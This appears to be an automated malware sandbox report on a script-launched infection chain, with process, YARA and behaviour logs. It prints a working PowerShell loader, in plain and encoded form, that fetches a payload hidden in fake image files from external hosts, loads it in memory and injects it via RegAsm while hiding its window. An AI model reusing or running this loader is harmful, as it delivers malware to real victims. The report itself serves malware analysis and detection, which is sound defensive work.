                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.dfgdmAI/niam/sdaeh/sfer/k63/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                Yara detected Costura Assembly Loader
                Source: Yara matchFile source: 6.2.RegAsm.exe.59f0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1642022551.00000000059F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1619760521.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3896, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_01664812 pushfd ; iretd 6_2_01664821
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_059ED8DE push esi; ret 6_2_059ED92D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_059ED004 push edx; iretd 6_2_059ED00D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_059E9BE1 push 8B059E9Eh; iretd 6_2_059E9C5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D94AF4 pushad ; retf 6_2_05D94AFD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D91E72 pushad ; retf 6_2_05D91E81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_062734FA pushad ; retf 6_2_062734FD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_06413AC2 push esp; iretd 6_2_06413AC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0641728B push ebx; iretd 6_2_0641728C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_06415F8B push ecx; iretd 6_2_06415FA5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_06412941 pushfd ; iretd 6_2_06412943
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0641711B push esp; iretd 6_2_0641711C
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, dS8NLBORQCnVypqC83v.csHigh entropy of concatenated method names: 'BCqOXeTmv9', 'U3pOumGsu4', 'fuIOlTMxKk', 'zixOrHaVXa', 'CkiO8lhY9c', 'JySO0WQdTN', 'ltJO5WQVx9', 'GONOW3oATt', 'aOZOZW4wdH', 'GxEptKaimOF2wqBtrf1'
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, HXWgqf7QK37HQ0ZpisZ.csHigh entropy of concatenated method names: 'wWc74tJV3d', 'i0M7tjFvsd', 'xmc7D5UyIb', 'DAQ76jgD5d', 'vKc7YmXJBj', 'qfo7BYhLkc', 'Jvm7yiCJ8F', 'hWa7sdSoWA', 'IqU7kwu7n7', 'Jca73Hjm9o'
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, Dc4xUxvOwXRXuWZuBqx.csHigh entropy of concatenated method names: 'G1CvmmDfsR', 'iFtvXHTZZE', 'qv9vuYO6aw', 'pAmvl2BZg2', 'NfGvrmE0A6', 'BP0v8pdobr', 'BGPv0hNxQE', 'y9Iv5XC42W', 'uHgvWmqc8U', 'zU2vZv9sUB'
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, QI6Jy4WEhefhjRy8hP9.csHigh entropy of concatenated method names: 'gvLhX3oBubUujS9vuYp', 'NLL83koyt6Wvt33yAhj', 'pgfZkkSeMY', 'vh0ry9Sq2v', 'tmJZg4Dl6V', 'bxiZD4WM21', 'IhOZ6o2txi', 'mOyZS55OA6', 'W6sek53ZPM', 'Uu9WcY71tn'
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, U3E6RwN5SaPZeZUlErQ.csHigh entropy of concatenated method names: 'yJoNZ7E45S', 'm2sNvL1Jpg', 'CQmNKvbK7F', 'qaeN2NtOP8', 'iMXN1SIOn4', 'hyFNMf9N6a', 'Mk4N9wG0GL', 'jyTNIWn3VI', 'mxXNQrUQrd', 'kRONbW4oVv'
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, o8P76yvvHV5KpUNsml7.csHigh entropy of concatenated method names: 'ogOQ0NcqVg', 'SAhQ5DjcbE', 'vjdQW9CUnK', 'kRLQZbCtQg', 'WEjQvXwYeL', 'QGfQKts7GH', 'JRuQ2fHKGZ', 'hT4vqP4jUa', 'dtRQ1ee6MW', 'CoWQMovtgf'
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, BYp4U2Oe5wBDI4goG2T.csHigh entropy of concatenated method names: 'SAkbTlwEevfVN7OfceR', 'firsqowOpF5u7MyABPY', 'lC52Q4wnWMdK6pAtMIY', 'lI2Dh7wfSbAAVvtZHvc', 'IfrcE44OyD', 'eMvcO4ZytH', 'tptcceFFV9', 'QObcnPQgnZ', 'lJ8cfe8ReD', 'IekcCYmCMn'
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, dSjLwOOBq5S8xcIDmvy.csHigh entropy of concatenated method names: 'CULufKTteJhl0RuNSew', 'oQVjUkTghxn2qQENTbW', 'Dispose', 'ToString', 'DXcMKrT6ieWNGruyEyf', 'jOEugUTStIEMcl8gjMd', 'QpGiTQhrZpHBs0vbm5Q', 'ssBPNmh8GL8a08qPsUB', 'SFcQmw7yx2', 'gl1QXQWNFG'
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, cOa8qNtY5ahAXGWQgN.csHigh entropy of concatenated method names: 'mxADtipSP', 'eS364pa0w', 'LJ9Sp5Wfx', 'me6ahOsMX', 'pV9FcqTsZ', 'C5KqE8v3J', 'q1eiJDFX0', 'uZ0Onrt3u2', 'oQATxfFEE', 'yqoVgFGZX'
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, uC0hRMPfPBtRWtAg1mn.csHigh entropy of concatenated method names: 'bXlPP3Ncc7', 'TYjP7Ktb1S', 'yu2PNpEHJA', 'oVMPjQKEyI', 'DE0PGQ9Xi0', 'RZdPLFYhvs', 'qx9PRtiFVD', 't6hPmRQrOD', 'wyNPXVSrKq', 'aPWPue8diN'
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, uoYFFbFNrROIvkLu0xr.csHigh entropy of concatenated method names: 'P72nGwSenT', 'NhcHtnWNFu9va73nvys', 'w8k8ESWYWycSHdEDYbX', 'bo9F1QtmFX', 'OqOFJOAGDW', 'ysuFnlhbBW', 'efEFd2n3iG', 'c13F5ZJUgX', 'AhdF939Mo8', 'y4KlWCpxZIo51bG4JAh'
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, L6j7a2k3TmQjt0GHQ4.csHigh entropy of concatenated method names: 'ptcKgDZ6A', 'TYlqG4Y3Q', 'ablo28gZf', 'vlraIh8kU', 'Oe6ic3yJY', 'zIP09Shfr', 'zgME3KJ1G', 'pjYQR7JTw', 'iBKZRCOWT', 'wfODOspvojvsQ3EFLCZ'
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, LgU3ZivqUV3r7RL9fo.csHigh entropy of concatenated method names: 'ku3VaO5No', 'ijOef1xAR', 'ITtfJPq14', 'TU5y2nps9', 'pVeHQNn8p', 'KWqxyuPaS', 'ly0p2K4b2', 'S3dgJd77B', 'OLbWOaJDJ', 'nikPtDbk1'
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, w0gUvjn1pmlF6l1K21B.csHigh entropy of concatenated method names: 'WBOqGFWrssOB3dv6e5I', 'HhTPVGWOsT7beLgPbGp', 'LU3dbKsgAc', 'vh0ry9Sq2v', 'HuMdkoer01', 'aLkdLvV3vC', 'wi4dKSNCIu', 'Lv8dqGmm8t', 'vuFerT55aM', 'emcnnilbTF'
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, ceI1TO5w0CZjAK5Q8IC.csHigh entropy of concatenated method names: 'v7c5jV9m03', 'yt75rMi6wm', 'uas5Or9rXm', 'Rne5MaTiLt', 'p2y54O1wxF', 'jjR5vrXnrm', 'hAW5AWHm2l', 'pGh5HTTdqN', 'MOX5x33XBl', 'lpR5p9D2eM'
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, GaIFs45gtG5cwTqScn0.csHigh entropy of concatenated method names: 's3MOrj19th', 'PHoOOp4Qwf', 'IxEOMjtP45', 'S4IO4ATVS6', 'E0aOvFChqP', 'F8vOAHJRAX', 'ioCOHt2EDp', 'ucd5qhAABS', 'eZJOxxZWii', 'DQsOp192jH'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
